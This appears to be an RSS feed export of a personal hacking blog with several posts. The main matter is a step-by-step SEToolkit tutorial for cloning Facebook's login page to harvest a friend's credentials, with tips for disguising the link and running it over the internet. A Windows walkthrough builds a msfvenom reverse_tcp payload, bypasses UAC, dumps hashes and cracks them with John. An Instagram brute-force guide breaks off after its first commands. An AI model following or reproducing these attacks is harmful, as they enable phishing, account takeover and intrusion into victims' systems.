<?xml version="1.0" encoding="utf-8" ?><rss version="2.0" xmlns:tt="http://teletype.in/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/"><channel><title>AHMED ALGHALEB</title><generator>teletype.in</generator><description><![CDATA[Programmer, Public Figure, Hacker, blogger, Virgins Protector, bug bounty hunter.🥇Award-winning first Iraqi jealousy ambassador &amp; 1st Cyber Security.]]></description><image><url>https://teletype.in/files/dd/d3/ddd3fe5f-7752-4f56-b2ee-79b78c0af784.jpeg</url><title>AHMED ALGHALEB</title><link>https://teletype.in/@iraqi</link></image><link>https://teletype.in/@iraqi?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=iraqi</link><atom:link rel="self" type="application/rss+xml" href="https://teletype.in/rss/iraqi?offset=0"></atom:link><atom:link rel="next" type="application/rss+xml" href="https://teletype.in/rss/iraqi?offset=10"></atom:link><atom:link rel="search" type="application/opensearchdescription+xml" title="Teletype" href="https://teletype.in/opensearch.xml"></atom:link><pubDate>Wed, 13 May 2026 23:30:46 GMT</pubDate><lastBuildDate>Wed, 13 May 2026 23:30:46 GMT</lastBuildDate><item><guid isPermaLink="true">https://teletype.in/@iraqi/Zaincash</guid><link>https://teletype.in/@iraqi/Zaincash?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=iraqi</link><comments>https://teletype.in/@iraqi/Zaincash?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=iraqi#comments</comments><dc:creator>iraqi</dc:creator><title>IRAQ WALLET PROJECT (ZAINCASH NOW)!!!</title><pubDate>Thu, 24 Sep 2020 15:22:39 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/ca/09/ca09151c-c057-41ae-add1-8cd54f900c73.jpeg"></media:content><category>Social</category><tt:hashtag>security</tt:hashtag><tt:hashtag>hacking</tt:hashtag><tt:hashtag>supermaniq</tt:hashtag><description><![CDATA[<img src="https://teletype.in/files/13/ae/13ae25ed-846e-4727-9239-0dd5c724b094.jpeg"></img>a long time have I been following the recklessness that occurs in the field of information security in this iraqi company.. Really, I am dissatisfied with the poor experience of this company ..]]></description><content:encoded><![CDATA[
  <p>a long time have I been following the recklessness that occurs in the field of information security in this iraqi company.. Really, I am dissatisfied with the poor experience of this company ..</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/13/ae/13ae25ed-846e-4727-9239-0dd5c724b094.jpeg" width="3840" />
  </figure>
  <p>just wanna say here that I am ready to provide assistance to Iraqi companies by securing their sites and applications with the latest protection methods and technologies with a free trial for small package of security features including me and my full software engineering team time.</p>
  <tt-tags>
    <tt-tag name="security">#security</tt-tag>
    <tt-tag name="hacking">#hacking</tt-tag>
    <tt-tag name="supermaniq">#supermaniq</tt-tag>
  </tt-tags>
  <p>We contract with large companies like Facebook, twitter, snapchat to secure their programs, so we do not need money from Iraqi companies greatly, but nevertheless we will be very lenient with you guys. </p>
  <p>Today, The team of Superman competes professionally in security conferences. </p>
  <blockquote>We are back to dash the hopes of the Black Hats. #AhmedAlghaleb</blockquote>
  <p></p>
  <p>for business try to contact me directly using my verified social media lists on my website only. <a href="https://ahmedalghaleb.me/info" target="_blank">https://ahmedalghaleb.me/info</a></p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@iraqi/mobile-fingrePrint-security</guid><link>https://teletype.in/@iraqi/mobile-fingrePrint-security?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=iraqi</link><comments>https://teletype.in/@iraqi/mobile-fingrePrint-security?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=iraqi#comments</comments><dc:creator>iraqi</dc:creator><title>How to Protect your mobile phone</title><pubDate>Thu, 17 Sep 2020 21:37:13 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/5b/f5/5bf54e2b-0b7e-4b4f-8e75-f6f080d72931.jpeg"></media:content><category>Virgins</category><tt:hashtag>ahmedalghaleb</tt:hashtag><tt:hashtag>supermaniq</tt:hashtag><description><![CDATA[<img src="https://teletype.in/files/5b/f5/5bf54e2b-0b7e-4b4f-8e75-f6f080d72931.jpeg"></img>https://www.instagram.com/p/CFP5wLaBMoY/]]></description><content:encoded><![CDATA[
  <tt-tags>
    <tt-tag name="ahmedalghaleb">#ahmedalghaleb</tt-tag>
    <tt-tag name="supermaniq">#supermaniq</tt-tag>
  </tt-tags>
  <figure class="m_original">
    <img src="https://teletype.in/files/5b/f5/5bf54e2b-0b7e-4b4f-8e75-f6f080d72931.jpeg" width="1080" />
  </figure>
  <figure class="m_original">
    <img src="https://teletype.in/files/7b/84/7b8459d2-d3f8-439a-903b-955d27f04017.jpeg" width="1080" />
  </figure>
  <figure class="m_original">
    <img src="https://teletype.in/files/c0/50/c050f93d-9b3f-4289-b2e2-f2c9173d3d5e.jpeg" width="1080" />
  </figure>
  <h1>This is part of my collection in pentagram for how to Protect your mobile phone.</h1>
  <p><a href="https://www.instagram.com/p/CFP5wLaBMoY/" target="_blank">https://www.instagram.com/p/CFP5wLaBMoY/</a></p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@iraqi/7-Best-Hacking-Tools-Everyone-Must-Know-09-10</guid><link>https://teletype.in/@iraqi/7-Best-Hacking-Tools-Everyone-Must-Know-09-10?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=iraqi</link><comments>https://teletype.in/@iraqi/7-Best-Hacking-Tools-Everyone-Must-Know-09-10?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=iraqi#comments</comments><dc:creator>iraqi</dc:creator><title>7 Best Hacking Tools Everyone Must Know</title><pubDate>Thu, 10 Sep 2020 13:15:38 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/18/93/18937ecc-b57a-4dfd-b8ff-5bbfae17aa17.png"></media:content><category>Hacking</category><tt:hashtag>ahmedalghaleb</tt:hashtag><tt:hashtag>supermaniq</tt:hashtag><description><![CDATA[<img src="https://teletype.in/files/d5/b3/d5b32604-ddeb-4109-a417-cbfa896b9ad0.png"></img>Ever since you enter the field of Ethical Hacking, you always want to have your hands get on most of the Hacking Tools. More tools you know, more your hacking career is about to fly off. So let’s discuss the best 7 hacking tools.]]></description><content:encoded><![CDATA[
  <figure class="m_original">
    <img src="https://teletype.in/files/d5/b3/d5b32604-ddeb-4109-a417-cbfa896b9ad0.png" width="566" />
  </figure>
  <blockquote>Ever since you enter the field of Ethical Hacking, you always want to have your hands get on most of the Hacking Tools. More tools you know, more your hacking career is about to fly off. So let’s discuss the best 7 hacking tools.</blockquote>
  <h4>1.) Nmap</h4>
  <p>It is a free and open-source tool that is used for network discovery and security auditing.</p>
  <p>Nmap is a powerful tool as it can be used to scan huge networks having thousands of machines. It is a command-line tool. Nmap suite also includes an advanced GUI that is called “ZenMap”.</p>
  <p><strong>It supports a wide range of operating system which are:</strong></p>
  <ul>
    <li>Linux</li>
    <li>Microsoft Windows</li>
    <li>FreeBSD</li>
    <li>OpenBSD</li>
    <li>Solaris</li>
    <li>IRIX</li>
    <li>Mac OS X</li>
  </ul>
  <p><strong>It uses raw IP packets to determine:</strong></p>
  <ul>
    <li>Hosts that are available on a particular network</li>
    <li>Services that are offered by these hosts i.e. Application name along with its versions</li>
    <li>Operating system and its version that is running on the target system</li>
    <li>Type of firewall on the target system</li>
    <li>Scans for the open ports using both TCP and UDP protocols</li>
  </ul>
  <p><strong>Nmap download link:</strong></p>
  <p><a href="https://nmap.org/download.html" target="_blank">https://nmap.org/download.html</a></p>
  <h4>2.) Metasploit</h4>
  <p>It is basically a Security Assessment and Penetration Testing tool. Metasploit can be used to launch an attack on other systems with it.</p>
  <p>It uses a vulnerable system on which security testing can be conducted in order to exploit the flaws in the system.</p>
  <p><strong>Metasploit can be implemented as follows:</strong></p>
  <ul>
    <li>Initially, TCP port scanning is done to obtain information about the target system.</li>
    <li>Host lists and services running on them can be viewed and analyzed in the project view.</li>
    <li>Now the vulnerability scan is run on the target system’s data which enlist the flaws within the system.</li>
    <li>This information can be used for planning the attack on the target system.</li>
  </ul>
  <p><strong>Metasploit download link:</strong></p>
  <p><a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers" target="_blank">https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers</a></p>
  <h4>3.) Angry IP Scanner</h4>
  <p>It is one of the fastest IP addresses and port scanner. By using this hacker can easily gather information about open ports in the target system.</p>
  <p>It pings each Ip address in the target system to check whether it’s alive. Further, it resolves the hostnames, determines the MAC address.</p>
  <p><strong>Features</strong>:</p>
  <ul>
    <li>It also extracts the NetBIOS information which includes services related to the session layer in the OSI model which are workgroup names and current active users.</li>
    <li>Scanned results can be saved in CSV, TXT, XML or IP-Port list files.</li>
    <li>It can gather any information about scanned IP’s as it uses plugins.</li>
    <li>If anyone can write plugins, he can efficiently extend the functionality of Angry IP Scanner.</li>
  </ul>
  <p><strong>Angry IP Scanner download link:</strong></p>
  <p><a href="https://angryip.org/download/#windows" target="_blank">https://angryip.org/download/#windows</a></p>
  <h4>4.) Nikto</h4>
  <p>It is a webserver assessment tool. Nikto is an open-source platform that performs tests against Web Servers to find various vulnerable files, misconfigurations, outdated servers and programs on that web server.</p>
  <p>It relies on HTTP response to determine whether a page or script exists on the target.</p>
  <p><strong>Features</strong>:</p>
  <ul>
    <li>Provides HTTP proxy support.</li>
    <li>Checks for the outdated server components.</li>
    <li>It can scan multiple ports on the server.</li>
    <li>Guesses credentials for authorization with trying many different ID and Password combinations.</li>
    <li>Reports for the unusual headers.</li>
  </ul>
  <p><strong>Nikto download link:</strong></p>
  <p><a href="https://github.com/sullo/nikto" target="_blank">https://github.com/sullo/nikto</a></p>
  <h4>5.) John the Ripper</h4>
  <p>JTR is free and open-source software that is widely used by hackers for password cracking. It uses the various cryptanalysis attacks such as “Dictionary Attack” and “Brute-Force Attack”.</p>
  <p>It also comes with the commercial version as well i.e. “John the Ripper Pro.” It is a more user-friendly version providing more functionality in password cracking at the enterprise level.</p>
  <p><strong>John the Ripper working:</strong></p>
  <ul>
    <li>Initially get the hashed password that has to be cracked.</li>
    <li>We need to have a wordlist of expected passwords in our system as it makes the password cracking job easier.</li>
    <li>Next, we enter the valid John the Ripper command that will be extracting the password from the hashed password given as an input.</li>
  </ul>
  <p>The rate at which the password will be cracked depends completely on the strength of the password and the available wordlist. It keeps trying to crack the password continuously until the termination command is not given.</p>
  <p><strong>John the Ripper download link:</strong></p>
  <p><a href="https://www.openwall.com/john/" target="_blank">https://www.openwall.com/john/</a></p>
  <h4>6.) Wireshark:</h4>
  <p>It is an open-source tool that is used to capture traffic on the network. It is basically a network protocol analyzer tool.</p>
  <p><strong>Wireshark helps in:</strong></p>
  <ul>
    <li>Sniffing for the passwords.</li>
    <li>Capturing all the packets over the network.</li>
    <li>Identifying the source and destination IP address of the traffic.</li>
    <li>Next, we enter the valid John the Ripper command that will be extracting the password from the hashed password given as an input.</li>
  </ul>
  <p>It also captures HTTP packet transmission over the network. Click on “Follow TCP connection” in the HTTP packet. Now you can see the username and passwords that are captures over the network.</p>
  <p><strong>Wireshark download link:</strong></p>
  <p><a href="https://www.wireshark.org/#download" target="_blank">https://www.wireshark.org/#download</a></p>
  <h4>7.) Burp Suite:</h4>
  <p>It is an integrated platform that is used for performing a test on web application security.</p>
  <p>It provides a wide range of tools that are used from initial mapping to exploiting the vulnerabilities in the applications. Once the flaws are detected hackers can use it to break into the security of the system. Burp Suite comes in three editions:</p>
  <ol>
    <li>Community Edition: Can be downloaded free of charge</li>
    <li>Professional Edition: Best tool for Penetration Testers and Bug Bounty Hunters</li>
    <li>Enterprise Edition: Used by an organization.</li>
  </ol>
  <p><strong>Burp Suite features:</strong></p>
  <ul>
    <li>It can be used to launch attacks on Web Applications. It can test and detect Cross-site scripting (XSS) and SQL injection.</li>
    <li>It operates as a web proxy server which helps in allowing interception, inspection, and modification of network traffic.</li>
  </ul>
  <p><strong>Burp Suite download link:</strong></p>
  <p><a href="https://portswigger.net/burp" target="_blank">https://portswigger.net/burp</a></p>
  <p><em>Share To Your Friends And Learn Together With Us</em></p>
  <tt-tags>
    <tt-tag name="ahmedalghaleb">#ahmedalghaleb</tt-tag>
    <tt-tag name="supermaniq">#supermaniq</tt-tag>
  </tt-tags>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@iraqi/Hacking-Facebook-Using-SE-Tool-Kit-Phishing-Attack-09-06</guid><link>https://teletype.in/@iraqi/Hacking-Facebook-Using-SE-Tool-Kit-Phishing-Attack-09-06?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=iraqi</link><comments>https://teletype.in/@iraqi/Hacking-Facebook-Using-SE-Tool-Kit-Phishing-Attack-09-06?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=iraqi#comments</comments><dc:creator>iraqi</dc:creator><title>Hacking Facebook Using SEToolKit (Phishing Attack)</title><pubDate>Sun, 06 Sep 2020 09:40:21 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/33/75/33755bf9-3bab-4f02-a020-0cc9e6046532.png"></media:content><category>Hacking</category><tt:hashtag>ahmedalghaleb</tt:hashtag><tt:hashtag>supermaniq</tt:hashtag><description><![CDATA[<img src="https://teletype.in/files/88/27/88276e7f-d95d-4bcd-8dda-1e96d9d048f1.png"></img>Facebook Hack By Social Engineering Toolkit (SET)]]></description><content:encoded><![CDATA[
  <figure class="m_original">
    <img src="https://teletype.in/files/88/27/88276e7f-d95d-4bcd-8dda-1e96d9d048f1.png" width="760" />
  </figure>
  <blockquote>Facebook Hack By Social Engineering Toolkit (SET)</blockquote>
  <p>Hack Facebook with Social Engineering, you can apply this method to hack Instagram accounts as well. But this tutorial is focused exclusively on how to hack Facebook accounts on Kali Linux with the Social Engineering Toolkit. But if you have just a little imagination you can apply the same steps you will learn in this tutorial and duplicate the process to hack another account for another website as well. Is pretty much the same with just a few small variations.</p>
  <h3>What Is Social Engineer Toolkit (SET)</h3>
  <p>The Social-Engineer Toolkit (SET) was created and written by the founder of TrustedSec. It is an open-source Python-driven tool aimed at penetration testing around Social-Engineering . SET has been given at large-scale conferences together with Blackhat, DerbyCon, Defcon, and ShmooCon. With over 2 million downloads, SET is that the standard for social-engineering penetration tests and supported heavily within the protection community.</p>
  <p>It is an application used by pen testers, hackers etc… it can be found in Kali Linux, parrot-sec, backbox and different pentesting OS otherwise you can install by downloading from github or simply type in terminal apt search set toolkit or search in synaptic for synaptic type in terminal synaptic otherwise you have not installed then type apt-get install synaptic then open synaptic look for set toolkit then right click on set and mark for installation then click on apply it will automatically install set for you.</p>
  <h3>What are Social Engineering Attacks ?</h3>
  <p>Social Engineering attacks are the various cons used by the hackers to trick people into providing sensitive data to the attackers. There are various type of social engineering attacks, some of the popular attacks are :-</p>
  <ul>
    <li>Phishing</li>
    <li>IVR or phone phishing</li>
    <li>Baiting</li>
    <li>Spear phishing</li>
  </ul>
  <h3>What you will need:</h3>
  <ul>
    <li>Kali Linux</li>
    <li>A little background on Networking and its terms (Private vs Public IPs esp.) would be good.</li>
    <li>You should be online.</li>
  </ul>
  <p>In the last decade, there were major hacks and leaks in social media platforms like Twitter, Facebook , LinkedIn and several others. currently the social media platforms take security very seriously and it has become very tough to hack directly into social media platforms, currently the hackers have moved the focus towards Social Engineering Attacks.</p>
  <h3>Lets start with Hack Facebook using SEToolKit (Phishing attack)</h3>
  <p><strong>Step 1 </strong>: Once you have installed <strong>SEToolkit</strong>, open up bash and type <strong>setoolkit</strong>.</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/fc/20/fc208c46-c852-4a30-bb19-02d46a335720.png" width="758" />
  </figure>
  <p><strong>Step 2 </strong>:Once SET is loaded it will show few options as shown in the image below. Select &quot;<strong>Social-Engineering Attacks</strong>&quot; by entering &quot;<strong>1</strong>&quot; and hit enter.</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/17/ff/17ff4c3a-404a-41a5-8d58-ab5e20e4928b.png" width="758" />
  </figure>
  <p><strong>Step 3 :</strong>We will be greeted with a screen similar to this that has many different attacks.</p>
  <p>I will be guiding you through one of the most effective options: Website Attack Vectors. Pretty much everyone who has used a computer has used the Internet, and pretty much everyone on the Internet will click on a link . Social Engineering is a society like Facebook or Twitter, but can also be as simple as, well, a link. <strong>SEToolkit </strong>helps you abuse that trust people have on the Internet, so not only do you have over 5 billion targets, but you can also recognize attacks like these.</p>
  <p>Type <strong>2 </strong>and press <strong>[Enter]</strong> to continue.</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/41/0e/410e1a79-b86e-46f8-8f1d-8345f32a571a.png" width="758" />
  </figure>
  <p><strong>Step 4 :</strong>We now have a list of 7 different attack vectors, all very effective. The 3 most effective vectors are the <strong>Credential Harvester</strong>, <strong>Metasploit Browser</strong>, and <strong>Java Applet Attack</strong>. Lets say that you want to get your friends <strong>Facebook </strong>login. By choosing <strong>Credential Harvester Attack Method</strong>, <strong>SEToolkit </strong>will copy any website you want and add a credential stealing code to the HTML.</p>
  <p>Type <strong>3 </strong>and press <strong>[Enter]</strong> to continue.</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/9a/1a/9a1afc08-7f55-45e6-87c7-75ef71f53ad4.png" width="758" />
    <figcaption>How to Hack Facebook using SET (Phishing attack) | Kali Linux</figcaption>
  </figure>
  <p><strong>Step 5</strong> :Type <strong>2 </strong>for Site Cloner.</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/ef/6f/ef6f56c4-2c43-4134-b0b3-36d1fd53e584.png" width="758" />
  </figure>
  <p><strong>Step 6 </strong>:In this step, it will ask for your IP address, if you are running the attack on LAN you can provide your internal IP address and if you are executing the attack on WAN then you have to provide your external IP address. In this article, we will be executing the attack on LAN, to check you internal IP address run &quot;<strong>ifconfig</strong>&quot;. Enter your IP address and hit enter.</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/2d/4f/2d4f5a12-0e70-4bd0-80da-90d7a0bd18e5.png" width="758" />
  </figure>
  <p><strong>Step 7 </strong>:Type Kali Linux I.P Address.(Now copy your Ip address to first Terminal)</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/b2/f3/b2f36b09-5413-4528-b499-d46170f30b29.png" width="758" />
  </figure>
  <p><strong>Step 8</strong> :(Now Enter url of site which you want to clone):we are <em>cloning/phishing https://www.facebook.com/</em> this will take a little bit time……</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/ee/db/eedba43c-0231-42f8-ba8e-8c89675232d6.png" width="758" />
  </figure>
  <p><strong>Step 9 </strong>:As victim will go on link he will get login in page and what the victim will type we will get in our harverster file created in directory….</p>
  <p>Open the Kali Linux I.P in your tageted system .Here i am opened in my Window 7 Browser in VMware Workstation.</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/32/21/32215d82-5f0b-47a0-acd0-0263691d2d55.png" width="758" />
  </figure>
  <p><strong>Step 10</strong> :Now I will go back to Kali Linux and check if we have successfully harvested the login details.</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/b0/38/b038e07c-f01a-46a0-a263-40fa1cd8776e.png" width="758" />
  </figure>
  <p><strong>Step 11 </strong>:We have successfully stolen the Facebook login credentials from the target machine. And also Credential has been successfully saved in the <em>/root/set/set.template</em></p>
  <figure class="m_original">
    <img src="https://teletype.in/files/9c/d6/9cd6d2cb-7db7-4989-a504-2ee16175cae4.png" width="758" />
  </figure>
  <h4>We have successfully stolen the Facebook login credentials from the target machine.</h4>
  <p>Few tips to be safe while browsing always check the address bar when you login into any website. As in the tutorial above if we have checked the address bar we would have known that its a fake login page.</p>
  <h3>Make it work over internet</h3>
  <p>To make the technique work over internet, you will need to use your public IP instead of private. Search google for what is my IP to find you public IP. Then use it. You can use tinyurl or something to make the url appear legitimate. Also, port forwarding might need to be enabled, as your router might block traffic on port 80. Firewall can also cause troubles. While this tutorial was nothing more than se-toolkit 1 2 3 [your IP] [facebook.com], the next post on getting your credential harvestor on the internet will make the tutorial complete and useful in practical sense.</p>
  <p><em>Share To Your Friends And Learn Together With Us</em></p>
  <tt-tags>
    <tt-tag name="ahmedalghaleb">#ahmedalghaleb</tt-tag>
    <tt-tag name="supermaniq">#supermaniq</tt-tag>
  </tt-tags>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@iraqi/System-Hacking-In-Kali-Linux-09-05</guid><link>https://teletype.in/@iraqi/System-Hacking-In-Kali-Linux-09-05?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=iraqi</link><comments>https://teletype.in/@iraqi/System-Hacking-In-Kali-Linux-09-05?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=iraqi#comments</comments><dc:creator>iraqi</dc:creator><title>System Hacking In Kali Linux</title><pubDate>Sat, 05 Sep 2020 05:29:28 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/e1/11/e111f5ed-a26a-4bdc-8cbe-b0ae5038c57a.png"></media:content><category>Hacking</category><description><![CDATA[<img src="https://teletype.in/files/10/33/1033f8c7-6bf1-4a78-bff0-a332101d1862.png"></img>Hacking System With Kali Linux. This Tutorial Is Only For Educational Purpose.]]></description><content:encoded><![CDATA[
  <figure class="m_original">
    <img src="https://teletype.in/files/10/33/1033f8c7-6bf1-4a78-bff0-a332101d1862.png" width="1280" />
  </figure>
  <blockquote>Hacking System With Kali Linux. This Tutorial Is Only For Educational Purpose.</blockquote>
  <h3>What Is System Hacking?</h3>
  <p>Illegal way to access someone’s computer that’s call system hacking a hacker hack the system using the malware, payload, and virus, Some hacking types are perfectly legal, One of the most important methods used by hackers in order to circumvent the standard authentication is password cracking.</p>
  <p>It is actually the very first step in the system hacking process. a hacker needs to physically access the target system and inject the payload target system. Let’s try some example</p>
  <h4>Windows System Hacking</h4>
  <p>First we create a payload using the metasploit framework simple run the command. payload is the part of transmitted data that is the actual intended message.</p>
  <pre>msfvenom -p windows/meterpreter/reverse_tcp lhost=172.20.10.103 lport=4545 -f exe &gt; hackNos.exe
</pre>
  <h4>Parameter uses</h4>
  <ul>
    <li>-p Payload to use</li>
    <li>lhost Attacker IP address</li>
    <li>lport Attacker listing port</li>
    <li>-f Output formate</li>
    <li>&gt; Payload output filename</li>
  </ul>
  <figure class="m_original">
    <img src="https://teletype.in/files/bd/ae/bdae6cdf-ded3-407c-a82e-dbad1aaca4a2.png" width="1536" />
  </figure>
  <p>and we start our Metasploit payload listener and load the module multi handler</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/54/bc/54bc783e-dc91-4fb1-9c81-70d329591e04.png" width="966" />
  </figure>
  <p>our TCP handler is start now we start any server I use python SimpleHTTPServer for transferring our payload target system.</p>
  <pre>python -m SimpleHTTPServer 80
</pre>
  <p>open any browser and download the payload target system</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/27/42/27423c23-edaa-4859-8c31-8ce688e56b03.png" width="862" />
  </figure>
  <p>our download is complete now click the open button and execute the payload</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/4f/1f/4f1fb156-7681-4eb7-b180-e1e4c9fd217f.png" width="463" />
  </figure>
  <p>Now we have meterpreter shell target machine run the sysinfo command it’s output show about system information.</p>
  <pre>sysinfo
</pre>
  <figure class="m_original">
    <img src="https://teletype.in/files/6b/e1/6be13c75-6a81-4f6c-ae5f-b74e469fd0f9.png" width="1359" />
  </figure>
  <p>we move on our next step dump all hashes but first, we migrate our payload with another running process ps command is show all running process target machine</p>
  <pre>ps
migrate 4040
</pre>
  <p>and run the getsystem command for administrator account access and we face a error priv_elevate_system we have now permission for administrator account access we can bypass the error using the post exploitation moudule</p>
  <pre>get system
background
</pre>
  <figure class="m_original">
    <img src="https://teletype.in/files/37/9f/379fc072-cbb9-48e7-b65b-c40d1c05df82.png" width="1235" />
  </figure>
  <h4>Post exploitation</h4>
  <p>run the session in background and load the module bypassuac_eventvwr and set the session name</p>
  <pre>use exploit/windows/local/bypassuac_eventvwr
set session 1
run
</pre>
  <p>and new meterpreter session is open again run the getsystem command our command is run successfully</p>
  <pre>getsystem
hashdum
</pre>
  <figure class="m_original">
    <img src="https://teletype.in/files/a7/86/a786d70c-9ea7-46f4-a35b-a9918a8802e3.png" width="1337" />
  </figure>
  <h4>Window hash Cracking</h4>
  <p>save the hash in a file and using the john tool we can crack the hash –word lists choose your word-lists path</p>
  <pre>cat hash.txt
john --wordlists=/usr/share/wordlists/rockyou.txt --format=NT hash.txt
</pre>
  <figure class="m_original">
    <img src="https://teletype.in/files/28/c2/28c28ec3-0bb1-46a8-bce5-b2719d30394a.png" width="1339" />
  </figure>
  <p><em>Share To Your Friends And Learn Together With Us</em></p>
  <h4>For Learning Hacking And Python Tutorials, Join Our Hacking And Python Tutorials account on Instagram by searching for #AHMEDALGHALEB</h4>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@iraqi/HOW-TO-HACK-NASA-WITH-HTML-LANGUAGE-2020</guid><link>https://teletype.in/@iraqi/HOW-TO-HACK-NASA-WITH-HTML-LANGUAGE-2020?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=iraqi</link><comments>https://teletype.in/@iraqi/HOW-TO-HACK-NASA-WITH-HTML-LANGUAGE-2020?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=iraqi#comments</comments><dc:creator>iraqi</dc:creator><title>HOW TO HACK NASA WITH HTML - ALGHALEB FOR FUN</title><pubDate>Sat, 29 Aug 2020 02:06:03 GMT</pubDate><category>stories</category><description><![CDATA[Thanks for watching it. your hero #AhmedAlghlaleb]]></description><content:encoded><![CDATA[
  <figure class="m_full_width" data-caption-align="center">
    <iframe src="https://streamable.com/e/75ofy4?autoplay=1"></iframe>
    <figcaption><strong>ATTENTION: THIS VIDEO HAS BEEN MADE FOR EDUCATIONAL USE ONLY.</strong></figcaption>
  </figure>
  <p>Thanks for watching it. your hero #AhmedAlghlaleb</p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@iraqi/zggurZ1Ku</guid><link>https://teletype.in/@iraqi/zggurZ1Ku?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=iraqi</link><comments>https://teletype.in/@iraqi/zggurZ1Ku?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=iraqi#comments</comments><dc:creator>iraqi</dc:creator><title>[LEAK] HOW TO GET FREE RDP [REMOTE DESKTOP SERVER]</title><pubDate>Tue, 25 Aug 2020 14:59:37 GMT</pubDate><description><![CDATA[Hello my biscuits fans, today I wanna share with you guys a list of best free sites that giving you free RDP with fast internet.]]></description><content:encoded><![CDATA[
  <p>Hello my biscuits fans, today I wanna share with you guys a list of best free sites that giving you free RDP with fast internet.</p>
  <p></p>
  <p><a href="http://vpswala.org/" target="_blank">http://vpswala.org/</a><br /><a href="http://ohosti.com/vpshosting.php" target="_blank">http://ohosti.com/vpshosting.php</a><br /><a href="https://gratisvps.net/" target="_blank">https://gratisvps.net/</a><br /><a href="https://my.letscloud.io/sign-up/" target="_blank">https://my.letscloud.io/sign-up/</a><br /><a href="https://developer.rackspace.com/" target="_blank">https://developer.rackspace.com/</a><br /><a href="https://www.vultr.com/" target="_blank">https://www.vultr.com/</a><br /><a href="https://www.ionos.com/enterprise-cloud" target="_blank">https://www.ionos.com/enterprise-cloud</a><br /><a href="https://www.cloudsigma.com/" target="_blank">https://www.cloudsigma.com/</a><br /><a href="https://www.digitalocean.com/" target="_blank">https://www.digitalocean.com/</a><br /><a href="http://ezywatch.com/freevps/" target="_blank">http://ezywatch.com/freevps/</a><br /><a href="https://yellowcircle.net/" target="_blank">https://yellowcircle.net/</a><br /><a href="https://www.ctl.io/free-trial/" target="_blank">https://www.ctl.io/free-trial/</a><br /><a href="https://www.ihor.ru/" target="_blank">https://www.ihor.ru/</a><br /><a href="https://www.neuprime.com/l_vds3.php" target="_blank">https://www.neuprime.com/l_vds3.php</a><br /><a href="https://www.apponfly.com/en/" target="_blank">https://www.apponfly.com/en/</a><br /><a href="https://www.skysilk.com/" target="_blank">https://www.skysilk.com/</a><br /><a href="https://sadd.io/" target="_blank">https://sadd.io/</a><br /><a href="https://vps.apponfly.com/" target="_blank">https://vps.apponfly.com/</a></p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@iraqi/How-to-Hack-Instagram-using-Insta-Shell-in-2020-08-24</guid><link>https://teletype.in/@iraqi/How-to-Hack-Instagram-using-Insta-Shell-in-2020-08-24?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=iraqi</link><comments>https://teletype.in/@iraqi/How-to-Hack-Instagram-using-Insta-Shell-in-2020-08-24?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=iraqi#comments</comments><dc:creator>iraqi</dc:creator><title>How to Hack Instagram using InstaShell in 2020</title><pubDate>Mon, 24 Aug 2020 08:38:31 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/ea/77/ea77a3c7-5fa6-42c6-953e-7f8b7cdc19f7.png"></media:content><category>Hacking</category><tt:hashtag>ahmedalghaleb</tt:hashtag><tt:hashtag>supermaniq</tt:hashtag><description><![CDATA[<img src="https://teletype.in/files/8d/8e/8d8ece40-9dee-4999-a0de-9ec1b8e0b490.png"></img>Instashell is originally coded by thelinuxchoice]]></description><content:encoded><![CDATA[
  <figure class="m_original">
    <img src="https://teletype.in/files/8d/8e/8d8ece40-9dee-4999-a0de-9ec1b8e0b490.png" width="764" />
  </figure>
  <p>Instashell is originally coded by thelinuxchoice</p>
  <blockquote>Try this for testing purpose only cause sometimes it’s no longer working :)</blockquote>
  <h3>STEP 1</h3>
  <ul>
    <li>Open Terminal in Kali Linux and type following command to create and open new Directory</li>
  </ul>
  <pre>mkdir bruteforce
cd bruteforce
</pre>
